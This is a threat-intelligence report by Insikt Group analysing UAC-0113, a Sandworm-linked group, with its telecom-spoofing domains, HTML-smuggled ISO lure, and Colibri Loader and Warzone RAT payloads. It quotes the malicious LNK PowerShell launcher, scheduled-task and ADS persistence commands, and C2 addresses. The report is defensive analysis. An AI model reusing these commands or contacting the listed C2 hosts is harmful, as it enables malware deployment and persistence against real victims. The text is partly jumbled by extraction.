#### CYBER THREAT ANALYSIS **RUSSIA** By Insikt Group® September 19, 2022 # Russia-Nexus UAC-0113 Emulating Telecommunication ----- ##### Key Judgments - Insikt Group has identified new infrastructure used by UAC-0113, a group linked with medium confidence to Sandworm by CERT-UA. Sandworm is a Russian advanced persistent threat (APT) group affiliated with the Main Intelligence Directorate/Main Directorate (GRU/ GU) of the General Staff of the Armed Forces of the Russian Federation. - Identified staging infrastructure continues the trend of masquerading as telecommunication providers operating within Ukraine and delivers malicious payloads via an _This report profiles the unique infrastructure used by the threat activity group_ _UAC-0113, which is linked with moderate confidence by CERT-UA to Sandworm._ HTML smuggling technique that deploys Colibri Loader _The activity was identified through a combination of large-scale automated network_ and Warzone RAT malware. _traffic analytics and analysis derived from open source reporting. The report will_ _be of most interest to individuals engaged in strategic and operational intelligence_ - Though the intent of the observed decoy document _relating to the activities of the Russian government in cyberspace and network_ _defenders._ found in connection with this activity is not fully known, it’s likely to be deployed against Ukraine-based targets in support of military action in the region similar to previous ##### Executive Summary UAC-0113 lures. Recorded Future continues to monitor cyber espionage - A transition from DarkCrystal RAT to Colibri Loader and operations targeting government and private sector organizations Warzone RAT demonstrates UAC-0113’s broadening but across multiple geographic regions including Ukraine. From continuing use of publicly available commodity malware. August 2022, Recorded Future observed a steady rise in command and control (C2) infrastructure used by the threat activity group tracked by Computer Emergency Response Team **Background** of Ukraine (CERT-UA) as UAC-0113. On June 24, 2022, a [report by CERT-UA detailed the use](https://cert.gov.ua/article/405538) UAC-0113 has been linked by CERT-UA to the Russian of the DarkCrystal remote access trojan (RAT) by UAC-0113, a advanced persistent threat (APT) group Sandworm. This report group CERT-UA has indicated as being linked to Sandworm, a highlights trends observed by Insikt Group while monitoring Russian Main Intelligence Directorate/Main Directorate (GRU/ UAC-0113 infrastructure, including the recurring use of dynamic GU) related threat group. The CERT-UA report indicated that DNS domains masquerading as telecommunication providers UAC-0113 was employing a malicious lure document which operating in Ukraine, which shows that the group’s efforts to deployed DarkCrystal RAT. This activity likely targeted entities target entities in Ukraine remains ongoing. Domain masquerades in Ukraine, specifically individuals or entities seeking information can enable spearphishing campaigns or redirects that pose a about Ukrainian military service personnel in relation to matters threat to victim networks. of legal assistance. Although the theme of this lure document was focused on military personnel legal matters, CERT-UA noted Using a combination of proactive adversary infrastructure that the attack was also likely targeted at telecommunications detections and domain analysis techniques, Insikt Group providers of Ukraine. determined that UAC-0113’s use of this newly discovered infrastructure overlaps with other infrastructure tactics, DarkCrystal RAT is a commodity malware dating back to techniques, and procedures (TTPs) previously attributed to at least 2018; a sample of the malware was [posted to Hybrid](https://www.hybrid-analysis.com/sample/7dcac4429dfe2a570ac33661cf6c48109780db6da9431721141ba47e6d27f710?environmentId=100) the group by CERT-UA. The information and TTPs provided in Analysis in November of that same year. Since its initial this report enables defenders to better search for and protect [discovery, reporting indicates that it has been offered for sale](https://cybersecuritynews.com/darkcrystal-rat/) against activity by UAC-0113. in underground forums, likely making it a tool of interest to a wide range of threat actor groups, including those entities seeking an infostealer that can hinder attribution efforts by government or security professionals. ----- Analysis of infrastructure linked to UAC-0113 uncovered a newly identified malicious ISO file (SHA256: [1c6643b4796](https://tria.ge/220916-nvj7wafff5) [1 4 3 4 0 0 9 7a 8 0 7 1 c 9 f 8 8 0 6 8 8 a f 5 a 8 2 d b 7 b 6 e 7 5 5 b e a f e](https://tria.ge/220916-nvj7wafff5) [7301eea1abf) as part of an HTML smuggling technique. The](https://tria.ge/220916-nvj7wafff5) ISO file contained a lure document, written in Ukrainian, that masquerades as a request for discounts on fuel for citizens of the Oleksandrivka Raion (district), an area in Donetsk. Additionally, the ISO file delivers an executable that deploys both Colibri Loader and Warzone RAT to the target machine. Colibri Loader, first reported by Insikt Group in August 2021, is a commodity malware leased on XSS Forum by the user “c0d3r_0f_shr0d13ng3r”. It is written in assembly and C to target Windows operating systems without any dependencies. On March 11, 2022, Cloudsek researchers [described Colibri Loader as “a](https://cloudsek.com/in-depth-technical-analysis-of-colibri-loader-malware/) type of malware that is used to load more types of malware into the infected system” which has “multiple techniques that help avoid detection”. On April 5, 2022, Malwarebytes researchers [also reported on the operations of the Colibri Loader and further](https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/) detailed its functionality, including its ability to “deliver and manage payloads onto infected computers”. Warzone RAT (also known as Ave Maria Stealer) is a popular commodity remote access tool (RAT) that has been in active development since 2018. It is sold on underground forums and on the developer’s website, warzone[.]ws. The malware is advertised as a full-featured RAT developed in C/C++ that claims to be “easy to use and highly reliable.” ##### Threat and Technical Analysis Insikt Group used intelligence provided by CERT-UA to discover further infrastructure linked to UAC-0113. The information uncovered suggests that it is highly likely that this threat group is continuing to masquerade as telecommunication providers operating within Ukraine. While monitoring the infrastructure, Insikt Group observed a malicious ISO file embedded in the HTML code, suggesting that domains and related IP addresses have likely already been, or are soon to become, operationalized. ###### Infrastructure A domain noted in CERT-UA’s June [report on UAC-0113,](https://cert.gov.ua/article/405538) datagroup[.]ddns[.]net, was likely masquerading as the Ukrainian telecommunications company Datagroup. This domain resolved to the IP address 31[.]7[.]58[.]82, which also [hosted a further](https://www.virustotal.com/gui/ip-address/31.7.58.82/relations) domain, kyiv-star[.]ddns[.]net, likely masquerading as the Ukrainian telecommunications company Kyivstar. Analysis of these domains and their related shared IP address [revealed a ZeroSSL TLS certificate hosted on port 443 with the](https://crt.sh/?id=6932000932) Subject Common Name datagroup[.]ddns[.]net. No [certificate](https://crt.sh/?q=kyiv-star.ddns.net) for kyiv-star[.]ddns[.]net was found. The server banner for IP address 31[.]7[.]58[.]82 is detailed below in Figure 2. _Figure 1: Maltego chart illustrating the links between previously reported infrastructure and the newly described infrastructure and activity in this reporting. See Appendix B_ ----- ``` HTTP/1.1 200 OK Date: Mon, 27 Jun 2022 03:17:00 GMT Server: Apache/2.4.41 (Ubuntu) ``` Last-Modified: Tue, 14 Jun 2022 09:52:56 GMT ETag: "0-5e1655e7b5c32" ``` Accept-Ranges: bytes Content-Length: 0 Content-Type: text/html ``` _Figure 2: Server Banner of the IP Address 31[.]7[.]58[.]82 (Source: Shodan.io)_ _Figure 3: ett[.]ddns[.]net certificate registration event (Source: Recorded Future)_ _[Figure 4: July 16, 2022, server banner and HTML from scan of the IP address 103[.]150[.]187[.]121 on port 4443 (Source: SecurityTrails)](https://securitytrails.com/app/sb/ip/103.150.187.121/ports)_ _Figure 5: darkett[.]ddns[.]net certificate registration event (Source: Recorded Future)_ ----- ###### ett[.]ddns[.]net Insikt Group identified further domain likely linked to UAC0113, ett[.]ddns[.]net, hosted between July 7 and 15, 2022, on IP address 103[.]150[.]187[.]121. The domain ett[.]ddns[.]net is likely a spoof of the legitimate domain for EuroTransTelecom LLC, ett[.]ua, a Ukrainian telecommunications operator. This new infrastructure has several overlaps with the infrastructure noted in the CERT-UA reports, such as the use of the Dynamic DNS provider NO-IP with a domain masquerading as a telecommunications provider operating in Ukraine, the use of a TLS certificate from a free TLS certificate provider, and a server banner that shares similarities with the banner seen on IP address 31[.]7[.]58[.]82 shown above in Figure 2. ###### darkett[.]ddns[.]net In addition to the ett[.]ddns[.]net domain, SecurityTrails banner [data identifies a similarly named domain, darkett[.]](https://securitytrails.com/app/sb/ip/103.150.187.121/ports) ddns[.]net, hosted on the same IP address, 103[.]150[.]187[.]121, as ett[.]ddns[.]net. The domain darkett.ddns[.]net also uses a TLS [certificate provided by ZeroSSL, similar to the previously](https://crt.sh/?id=7128307553) observed domain datagroup[.]ddns[.]net. Further analysis of the domain darkett.ddns[.]net revealed that between July 15 and 16, 2022, the domain was also hosted on IP address 94[.]153[.]171[.]42. Historical DNS for IP address 94[.]153[.]171[.]42 also lists a resolution for the domain kievstar[.] online on July 12, 2022. ###### kievstar[.]online On July 12, 2022, the domain kievstar[.]online moved from IP address 94[.]153[.]171[.]42 to multiple content delivery network (CDN) IP addresses hosted by Cloudflare. Further analysis of the domain kievstar[.]online details a Let’s Encrypt TLS [certificate](https://crt.sh/?id=7113878052) that was created on July 12, 2022. ###### 103[.]150[.]187[.]121, ett[.]hopto[.]org and star-link[.] ddns[.]net On August 1, 2022, SecurityTrails identified further updates to the IP address 103[.]150[.]187[.]121, listing a new TLS [certificate for the domain ett[.]hopto[.]org. This TLS certificate](https://crt.sh/?id=7115444279) is also provided by ZeroSSL and was created on July 13, 2022. On July 13, 2022, the domain ett[.]hopto[.]org resolved to the IP address 217[.]77[.]221[.]199. Further analysis of this IP address also details the resolution of the domain, star-link[.]ddns[.]net, on August 15, 2022, again likely spoofing a telecommunications company, Starlink (operated by American manufacturer SpaceX), [which is reportedly assisting Ukraine in the conflict with Russia.](https://www.wired.com/story/starlink-ukraine-internet/) ``` … “issuer”: { “common_name”: “ZeroSSL RSA Domain Secure Site CA”, “country_name”: “AT”, “distinguished_name”: “Common Name: ZeroSSL RSA Domain Secure Site CA, Organization: ZeroSSL, Country: AT”, “organization_name”: “ZeroSSL” } … “subject”: { “common_name”: “ett.hopto[.]org”, “distinguished_name”: “Common Name: ett. hopto[.]org” } … “validity”: { ``` “not_after”: “2022-10-11T23:59:59+00:00”, “not_before”: “2022-07-13T00:00:00+00:00” ``` } … { :”ofni_revres“ ,”2.1vSLT“ :”detroppus_noisrev_lss_tsehgih“ ,”121].[781].[051].[301“ :”emantsoh“ ,”121].[781].[051].[301“ :”sserdda_pi“ _SLT“ :”detroppus_gnirts_rehpic_lssnepo“ ``` ,”652AHS_MCG_821_SEA_HTIW_ASR_EHDCE ``` 344 :”trop“ } … ``` _Figure 6: JSON excerpts from August 1, 2022, scan of the IP address 103[.]150[.]187[.]121 on port_ _[443 (Source: SecurityTrails)](https://securitytrails.com/app/sb/ip/103.150.187.121/ports)_ ----- ###### star-cz[.]ddns[.]net Analysis of the domain star-cz.ddns[.]net, [reported by](https://cert.gov.ua/article/160530) CERT-UA on June 10, 2022, shows a resolution to the IP address 103[.]27[.]202[.]127. A further domain, kyivstar[.]online, was also found to resolve to this same IP address and the use of this domain continues with the theme of emulating telecommunication providers in Ukraine. The aforementioned use of the similar domain kievstar[.]online is of note as the spelling is not typically [employed in Ukraine but has been employed previously by the](https://www.cbc.ca/news/world/cbc-pronunciation-kyiv-ukraine-crisis-explainer-1.6371766) international community, as well as historically during Soviet times, and has now been carried into Russian domestic colloquial use. ##### Domain to IP Address Resolutions Timeline ###### HTML Analysis1 The domains ett[.]ddns[.]net, star-link[.]ddns[.]net, kievstar[.]online, and IP addresses 103[.]150[.]187[.]121 and 217[.]77[.]221[.]199 have all hosted, at various times, the same web page. The web page features the Ukrainian-language text “ОДЕСЬКА ОБЛАСНА ВІЙСЬКОВА АДМІНІСТРАЦІЯ” which translates as “Odesa Regional Military Administration”, along with “File is downloaded automatically” in English as shown in Figure 9 below. **_Figure 9: Screenshot of 103[.]150[.]187[.]121 (Source: URLScan)_** Contained within the HTML of the webpage is a Base64encoded [ISO file that is deployed via the HTML smuggling](https://tria.ge/220916-nvj7wafff5) technique. This ISO file is set to auto-download when the website is visited. Figure 10 below shows the HTML content of the file. 1 As part of the ongoing tracking of UAC-0113 activity, Insikt Group has identified that as of September 5th, 2022, the staging servers, kievstar[.]online, and IP address 103[.]150[.]187[.]121 have been updated and are now serving new malicious lure files via HTML smuggling. The newly identified lure files masquerade as a “password leak” and deliver Eternity Stealer malware. ----- **_Figure 10: The HTML content for the IP address 103[.]150[.]187[.]121 (with Base64-encoded data_** _removed), August 8, 2022 (Source: URLScan)_ Insikt Group inspected the web page’s HTML, and identified embedded JavaScript, which assists in the malicious ISO delivery behavior of the page. Testing the functionality of the for loop on lines 26 to 28 does not change the Base64-encoded data held in the variable “binary”. The for loop attempts to take away the integer value 11 from the characters that make up the Base64 string. JavaScript will produce an error when attempting to subtract an integer from a char, resulting in its value not being updated. The Base64 contents of the variable “binary” will be exactly the same after going through the for loop, making it redundant, and the Base64 data will still correctly decode to an ISO file. The purpose of the inclusion of this routine by UAC-0113 could be due to operator error, as its functionality serves no purpose because strings are immutable objects in JavaScript. [Of note, a report by Palo Alto’s Unit42 details a similar HTML](https://unit42.paloaltonetworks.com/cloaked-ursa-online-storage-services-campaigns/) Smuggling routine used by APT29 in a separate campaign to download an ISO file, shown below in Figure 11. APT29’s original use of this routine was for a binary array, which helps to potentially illuminate UAC-0113’s redundant for loop’s original purpose. APT29’s HTML and JavaScript code has similar overlaps with the UAC-0113 linked sample shown in Figure 10 above. _Figure 11 : Screenshot of HTML content, used by APT29, from hXXps://porodicno[.]ba/wp-content/_ _Agenda[.]html (with the array of decimal values of obfuscated payload abbreviated with the use of_ _[“......”) (Source: URLScan)](https://urlscan.io/result/5ebffdb2-792b-45fd-87c1-78f075200272/dom/)_ APT29’s correctly functioning for loop routine can be seen on lines 11-13 shown in Figure 11 above and further detailed in Figure 12 below, which is used to subtract the integer 17 from each of the decimal values in the variable “d”, which deobfuscates the malicious ISO payload. Further comparison of the 2 routines highlights some cosmetic changes, possibly to frustrate security researchers and hinder signaturing of these functions. ----- **_[Figure 12: Screenshot of the for loop used by APT29 in hXXps://porodicno[.]ba/wp-content/Agenda[.]html (Source: URLScan)](https://urlscan.io/result/5ebffdb2-792b-45fd-87c1-78f075200272/dom/)_** **_Figure 13: Screenshot of the for loop used by UAC-0113 in 103[.]150[.]187[.]121 (Source: URLScan)_** It is currently unknown why there is a similarity overlap between the 2 threat actor groups’ use of this ISO delivery functionality; one hypothesis is that UAC-0113 took inspiration from or directly copied this functionality from open source reporting on APT29, or that the same open source resource was used as a codebase. ###### Malware Analysis An analysis of the UAC-0113 ISO file and its content was conducted by Insikt Group and is detailed in the following sections. ###### 3_ЗАЯВА-на-отримання-компенсації.iso A Base64-encoded ISO file, titled “3_ЗАЯВА-на-отриманнякомпенсації.iso” (SHA256: [1c6643b479614340097a8071c9f](https://tria.ge/220916-nvj7wafff5) [880688af5a82db7b6e755beafe7301eea1abf) was found within](https://tria.ge/220916-nvj7wafff5) the HTML of IP address 103[.]150[.]187[.]121. The ISO file was created on August 5, 2022, its title translates from Ukrainian as “3_APPLICATION-for-receiving-compensation”. The ISO file contains a folder titled “ЗАЯВА” and 3 files as shown in Table 1 below. |Filename|Translation|SHA256| |---|---|---| |jfilyg7.exe|N/A|722c36abd195cce70ee25b48d6e64873262e046 eae7433976120a1496f01487d| |ЗАЯВА-на-отримання- компенсації.lnk|APPLICATION-for-receiving- compensation.lnk|bc4cab14e4b378a7b98185367b4778f92eb4335f aba1a4503f4cfb7aba8f13e7| |ЗАЯВА/3_ЗАЯВА-на-отримання- компенсації-додаткової-знижки- сімям-загиблих2.doc|APPLICATION/3_APPLICATION- for-receiving-compensation- additional-discount-for-the- families-of-the-deceased2.doc|a5a20063c8699c66f5292ed1da7c860360baf6cf 2a52f33c2c0b8873a995397c| _Table 1: File content information and translations for 3_ЗАЯВА-на-отримання-компенсації.iso (Source: Recorded Future)_ ----- The directory “ЗАЯВА” and “jfilyg7.exe” file were both configured as hidden, and would not normally be visible to the victim by default. ###### ЗАЯВА-на-отримання-компенсації.lnk The malicious shortcut (LNK) file is visible by default to the victim and is used to initiate a malicious PowerShell script. The LNK file is configured to use a Windows folder icon, as shown in Figure 15 below, likely in an attempt to masquerade as a legitimate folder. The shortcut file contains the comment “WORKED3”, possibly indicating that this is the third attempt to create the malicious payload. **_Figure 15: Screenshot of the properties tab for the LNK file ЗАЯВА-на-отримання-компенсації.lnk_** _(Source: Recorded Future)_ The target of the shortcut is powershell.exe, which is executed with a small script provided as a command line argument via the Command option. The PowerShell script, shown in Figure 15 below, determines the drive letter that the ISO file is mounted on by iterating over each of the system’s available drives looking for hidden files located in the root of the filesystem with a filename containing the string “jfilyg7”. Once the drive letter is identified, it proceeds to open the “ЗАЯВА” folder using the Invoke-Item cmdlet and also executes “jfilyg7.exe” using the Start-Process cmdlet. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ powershell.exe -Command $f = ‘jfilyg7’;Foreach($d in Get-PSDrive|ForEach-Object{$PSItem. Root} | findstr ‘:\’) {$w=gci -hidden $d | findstr $f;if($w.Contains($f)){break}};ii $d’ЗАЯВА’;start($d+$f) _Figure 16: Target of the ЗАЯВА-на-отримання-компенсації.lnk shortcut file (Source: Recorded_ ----- _Figure 17: Overview Colibri Loader and WarzoneRAT execution (Source: Recorded Future)_ _Future)_ ###### jfilyg7.exe The main payload, jfilyg7.exe, is an instance of Colibri Loader used to deliver Warzone RAT to the victim’s system. The loader communicates2 with its command-and-control (C2) server over HTTP using a combination of RC4 encryption and Base64 encoding, and is capable of downloading new payloads to execute and removing itself from victim systems. Figure 17, shown below, provides an overview of the actions performed by each malware. Upon execution, jfilyg7.exe decrypts 2 embedded portable executable (PE) file payloads. The first PE file is a copy of Colibri Loader that is written to “C:\ProgramData\conhost.exe” and executed. The second PE file is a copy of WarzoneRAT that is injected into a spawned copy of jfilyg7.exe via process hollowing. 2 https[:]//fr3d[.]hk/blog/colibri-loader-back-to-basics ### Colibri Loader Colibri Loader’s conhost.exe process follows a similar pattern as jfilyg7.exe, as shown in Figure 18 below. It decrypts a PE file payload, spawns a copy of itself, and then uses process hollowing to execute the payload. The injected payload is another instance of Colibri Loader that is used to communicate with its C2 server and establish persistence on the victim machine. For persistence, Colibri Loader drops a copy of itself in “%APPDATA%\Local\Microsoft\WindowsApps” folder as GetVariable.exe. It then creates the seemingly benign-looking scheduled task shown in Figure 19 to execute a hidden instance of PowerShell. schtasks.exe /create /tn COMSurrogate /st 00:00 /du 9999:59 /sc once /ri 1 /f /tr “powershell. exe -windowstyle hidden” _Figure 19: Scheduled task used by Colibri Loader for persistence (Source: Recorded Future)_ ----- _Figure 18: conhost.exe payload decryption and process injection (Source: Recorded Future)_ When run, the scheduled task takes advantage of a searching order hijacking vulnerability in PowerShell [identified](https://www.malwarebytes.com/blog/news/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique) by MalwareBytes in April 2022. The Get-Variable cmdlet is used as part of PowerShell’s initialization; however, PowerShell searches for the cmdlet using the default path (containing the WindowsApps directory) first, and therefore executes the Colibri payload instead of the legitimate Get-Variable cmdlet. Finally, the Colibri Loader process begins communication with its C2. To do this, it generates a UID3 based on the victim machine’s serial number and sends it via a “check” command to the C2. Once the C2 responds, it follows up with an “update” command to provide the C2 with information about the victim machine. It then sends a “ping” command that is used to check for further instructions from the C2, such as downloading a new payload or cleaning up an infected system. A full configuration extraction of the Colibri Loader sample is provided below in Table 2. It shows that the Colibri Loader is version 1.2.0, the botnet identifier is “Build1”, and 2 C2 addresses are provided. **Item** **Value** **Version** 1.2.0 **Botnet** Build1 hXXp://zpltcmgodhvvedxtfcygvbg­ jkvgvcguygytfigj[.]cc/gate.php **C2 Addresses** hXXp://yugyuvyugguitgyuigtfyutdtogh­ ghbbgyv[.]cx/gate.php _Table 2: Extracted Colibri Loader configuration (Source: Recorded Future)_ ###### Warzone RAT The Warzone RAT payload also establishes persistence on the victim machine. It employs 2 methods: a batch file placed in the user’s Startup folder and a registry run key. Warzone RAT drops a copy of itself in the “ApplicationData” [alternate data stream (ADS) of a file named “Documents” located](https://www.malwarebytes.com/blog/news/2015/07/introduction-to-alternate-data-streams) in the user’s Documents folder. A batch file named “programs. bat” is also created and placed in the user’s “%AppData%\ Roaming\Microsoft\Windows\Start Menu\Programs\Startup” folder. This file contains commands to loop through another ADS stored in the “programs.bat” file named “start” and executes each line within the stream. The “programs.bat:start” ADS contains a wmic command to create a process from the Documents:ApplicationData ADS. The full contents of the programs.bat file and its start ADS are provided in Figures 20 and 21. for /F “usebackq tokens=*” %%A in (“C:\ Users\\AppData\Roaming\Microsoft\Windows\ ``` Start Menu\Programs\Startup\programs.bat:start”) ``` do %%A _Figure 20: Contents of Warzone RAT’s programs.bat file (Source: Recorded Future)_ wmic process call create ‘”C:\Users\\ Documents\Documents:ApplicationData”’ _Figure 21: Contents of Warzone RAT’s programs.bat:start ADS (Source: Recorded Future)_ For the other persistence method, Warzone RAT drops a copy of itself in the user’s Documents folder as MSCommonDriver.exe and sets the registry run key shown below to the dropped file’s path. The file name MSCommonDriver.exe has also previously [been used by UAC-0113 during their deployment of DarkCrystal](https://cert.gov.ua/article/405538) RAT. |Item|Value| |---|---| |Version|1.2.0| |Botnet|Build1| |C2 Addresses|hXXp://zpltcmgodhvvedxtfcygvbg­ jkvgvcguygytfigj[.]cc/gate.php| ||hXXp://yugyuvyugguitgyuigtfyutdtogh­ ghbbgyv[.]cx/gate.php| ----- \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\ ``` CurrentVersion\Run\MSCommonDriver ``` _Figure 22: Warzone RAT’s registry run key used for persistence (Source: Recorded Future)_ The MSCommonDriver.exe is also executed and then begins communicating with the Warzone RAT C2 located at darkfox[.] ddns[.]net on port 443. **Domain** **Port** darkfox[.]ddns[.]net 443 darksea[.]ddns[.]net 443 _Table 3: Extracted Warzone C2 configuration (Source: Recorded Future)_ ###### ЗАЯВА/3_ЗАЯВА-на-отримання-компенсації- додаткової-знижки-сімям-загиблих2.doc A decoy document, titled “3_ЗАЯВА-на-отриманнякомпенсації-додаткової-знижки-сімям-загиблих2.doc”, found inside the folder “ЗАЯВА”, is shown in Figure 23. The document is opened via the commands executed by the aforementioned LNK file ЗАЯВА-на-отримання-компенсації.lnk. The folder and document translate from Ukrainian to English as “APPLICATION” and “3_APPLICATION-for-receiving-compensation-additionaldiscount-for-the-families-of-the-deceased2.doc”, respectively. The document itself does not engage in malicious activity but is used to hide the operations undertaken by the malicious LNK file. The Ukrainian-language text details that the document is an application for citizens to request discounts on fuel from the head of the Zaporozhye Regional Department for Social Protection in the Oleksandrivka Raion (district), an area in Donetsk. ###### Colibri Loader and Warzone Rat C2 Analysis Colibri Loader C2 Servers Network analysis of the Colibri Loader sample reveals communication to 2 distinct domains, yugyuvyugguitgyuigtfyutdtoghghbbgyv[.]cx, which as of August 1, 2022, resolves to IP address 65[.]108[.]213[.]210, and zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj[.]cc, which between June 28, 2022, and up until July 28, 2022, also resolved to the aforementioned IP address 65[.]108[.]213[.]210. As of July 28, 2022, zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj[.]cc resolves to a CDN IP address hosted by Cloudflare. Insikt Group is unable to definitively state if UAC-0113 is the sole owner or operator of these C2 domains, or if they are owned or controlled by the threat actors or authors behind Colibri themselves. Searches within Hatching Triage’s public sandbox revealed [30 distinct uploaded samples that have also communicated with](https://tria.ge/s?q=domain%3Azpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc+AND+domain%3Ayugyuvyugguitgyuigtfyutdtoghghbbgyv.cx+&offset=2022-08-10T10%3A54%3A14.661298939Z&limit=50&button=) both of these Colibri Loader C2 domains, with the earliest sample submitted on July 4, 2022. Within the 30 samples, there are also references to a range of other malware including: - Raccoon Stealer - RedLine Stealer - Socelars - Nymaim - PrivateLoader - Dark Crystal RAT - Djvu Ransomware - Vidar Stealer ###### Warzone Rat C2 Server Network analysis of the Warzone RAT sample deployed by file “jfilyg7.exe”, revealed communication to 2 C2 domains, darkfox[.] ddns[.]net, which resolves to IP address 94[.]158[.]156[.]4 and is listed as being hosted in the city of Odesa, Ukraine, and darksea[.]ddns, which resolves to IP address 91[.]200[.]114[.]141 which is listed as being hosted in Lviv, Ukraine. |Domain|Port| |---|---| |darkfox[.]ddns[.]net|443| |darksea[.]ddns[.]net|443| ----- _Figure 23: Screenshot of the contents of the 3 ЗАЯВА-на-отримання-компенсації-додаткової-знижки-сімям-загиблих2.doc file (Source: Recorded Future)_ ----- ###### Port 8291 Analysis of the 2 IP addresses revealed that both have port [8291 open and return a “MikroTik WinBox” banner. MikroTik](https://beta.shodan.io/host/94.158.156.4) Winbox is an application to aid in the administering of MikroTik RouterOS devices4. Sandworm has historically exploited MikroTik routers as part of a wide-scale botnet known as VPNFilter and Cyclops Blink. VPNFilter, which was initially [identified in June](https://arstechnica.com/information-technology/2018/06/vpnfilter-malware-infecting-50000-devices-is-worse-than-we-thought/) [2018, and Cyclops Blink, which was discovered in February 2022,](https://arstechnica.com/information-technology/2022/02/russias-most-cut-throat-hackers-infect-network-devices-with-new-botnet-malware/) affected MikroTik routers as well as a wide range of routing devices produced by other manufacturers. MikroTik Winbox: MikroTik Winbox: ``` index: index: ``` advtool.dll: 6.49.6 advtool.dll: 6.46.8 dhcp.dll: 6.49.6 dhcp.dll: 6.46.8 hotspot.dll: 6.49.6 hotspot.dll: 6.46.8 mpls.dll: 6.49.6 mpls.dll: 6.46.8 pim.dll: 6.49.6 ppp.dll: 6.46.8 ppp.dll: 6.49.6 roteros.dll: 6.46.8 roteros.dll: 6.49.6 roting4.dll: 6.46.8 roting4.dll: 6.49.6 secure.dll: 6.46.8 secure.dll: 6.49.6 system.dll: 6.46.8 system.dll: 6.49.6 wlan6.dll: 6.46.8 wlan6.dll: 6.49.6 `list:` `list:` advtool.jg: 6.46.8 advtool.jg: 6.49.6 dhcp.jg: 6.46.8 dhcp.jg: 6.49.6 hotspot.jg: 6.46.8 hotspot.jg: 6.49.6 icons.png: 6.46.8 icons.png: 6.49.6 mpls.jg: 6.46.8 `icons24.png:` ppp.jg: 6.46.8 `icons32.png:` roteros.jg: 6.46.8 mpls.jg: 6.49.6 roting4.jg: 6.46.8 pim.jg: 6.49.6 secure.jg: 6.46.8 ppp.jg: 6.49.6 wlan6.jg: 6.46.8 roteros.jg: 6.49.6 roting4.jg: 6.49.6 secure.jg: 6.49.6 wlan6.jg: 6.49.6 _Figures 24 and 25: “MikroTik Winbox” banners on port 8291. Left: 94[.]158[.]156[.]4; Right:_ _[91[.]200[.]114[.]141 (Source: URLScan) (Source: Shodan and Shodan)](https://beta.shodan.io/host/94.158.156.4)_ ###### Port 443 IP address 94[.]158[.]156[.]4, linked to the darkfox[.]ddns[.] net, also had port 443 open. Analysis of port 443 returns 12 bytes of data, which is consistent with known [Warzone RAT](https://research.checkpoint.com/2020/warzone-behind-the-enemy-lines/) server responses. 05 38 6b f4 62 f4 9f 3f 35 2f 6e e6 _Figure 26: Bytes returned from 94[.]158[.]156[.]4 on port 443 (Source: Recorded Future)_ Further analysis of the Warzone RAT sample jfilyg7.exe revealed that it uses a custom implementation of the RC4 cipher with a decryption key of “nevergonnagiveyouup” for C2 communications. Inskit Group was able to decrypt the bytes returned by the Warzone Rat C2 hosted on IP address 94[.]158[.]156[.]4 via the custom RC4 cipher with the key shown 4 https://whatportis.com/ports/8291_winbox-default-on-a-mikrotikrouteros-for-a-windows-application-used-to-administer-mikrotik-routeros in Figure 27. The decrypted bytes conform to the expected [packet structure previously reported by Checkpoint.](https://research.checkpoint.com/2020/warzone-behind-the-enemy-lines/) 29 bb 66 e4 00 00 00 00 00 00 00 00 _Figure 27: Decrypted bytes returned from 94[.]158[.]156[.]4 on port 443 (Source: Recorded Future)_ ##### Mitigations The delivery of Warzone RAT and Colibri Loader, along with their C2 communication, is best detected using intrusion detection systems (IDS) like Snort. Users should conduct the following measures to detect and mitigate activity associated with these pieces of malware: - Configure your intrusion detection systems (IDS), intrusion prevention systems (IPS), or any network defense mechanisms in place to alert on — and upon review, consider blocking connection attempts to and from — the external IP addresses and domains listed in the appendix. - Recorded Future Hunting Packages can be used to hunt for the presence of malicious files associated with Warzone RAT and Colibri Loader. YARA rules for each malware family can be found in Appendix D. - Recorded Future proactively detects malicious server configurations and provides means to block them in the Command and Control Security Control Feed. The Command and Control Feed includes tools used by UAC-0113 and other Russian state-sponsored threat activity groups. Recorded Future clients should alert on and block these C2 servers to allow for detection and remediation of active intrusions. - Recorded Future Threat Intelligence (TI), Third-Party [Intelligence, and SecOps Intelligence modules users can](https://www.recordedfuture.com/license-options/) monitor real-time output from Network Traffic Analysis analytics to identify suspected targeted intrusion activity involving your organization or key vendors and partners. - Monitor for domain abuse, such as typosquat domains spoofing your organization, through the Recorded [Future Brand Intelligence (BI) module. The SecurityTrails](https://www.recordedfuture.com/license-options/) extension is available to any customer that has a subscription to the Threat Intelligence or Brand Intelligence modules. The LogoType source and alerting is exclusive to the BI module, though the TI module does have access to the data via the Advanced Query Builder. |MikroTik Winbox: index: advtool.dll: 6.49.6 dhcp.dll: 6.49.6 hotspot.dll: 6.49.6 mpls.dll: 6.49.6 pim.dll: 6.49.6 ppp.dll: 6.49.6 roteros.dll: 6.49.6 roting4.dll: 6.49.6 secure.dll: 6.49.6 system.dll: 6.49.6 wlan6.dll: 6.49.6 list: advtool.jg: 6.49.6 dhcp.jg: 6.49.6 hotspot.jg: 6.49.6 icons.png: 6.49.6 icons24.png: icons32.png: mpls.jg: 6.49.6 pim.jg: 6.49.6 ppp.jg: 6.49.6 roteros.jg: 6.49.6 roting4.jg: 6.49.6 secure.jg: 6.49.6 wlan6.jg: 6.49.6|Col2|MikroTik Winbox: index: advtool.dll: 6.46.8 dhcp.dll: 6.46.8 hotspot.dll: 6.46.8 mpls.dll: 6.46.8 ppp.dll: 6.46.8 roteros.dll: 6.46.8 roting4.dll: 6.46.8 secure.dll: 6.46.8 system.dll: 6.46.8 wlan6.dll: 6.46.8 list: advtool.jg: 6.46.8 dhcp.jg: 6.46.8 hotspot.jg: 6.46.8 icons.png: 6.46.8 mpls.jg: 6.46.8 ppp.jg: 6.46.8 roteros.jg: 6.46.8 roting4.jg: 6.46.8 secure.jg: 6.46.8 wlan6.jg: 6.46.8| |---|---|---| ----- ##### Outlook Insikt Group continues to track UAC-0113 infrastructure observing changes in TTPs as its operations diversify across Ukraine, this time with a significant focus on telecommunication providers. There has been a notable continuation of the use of publically available commodity malware showing UAC-0113 adapting its operations with a willingness to use a variety of tooling. Readers should detect, block, and hunt for the presence of the indicators referenced in connection with UAC-0113 reporting via the 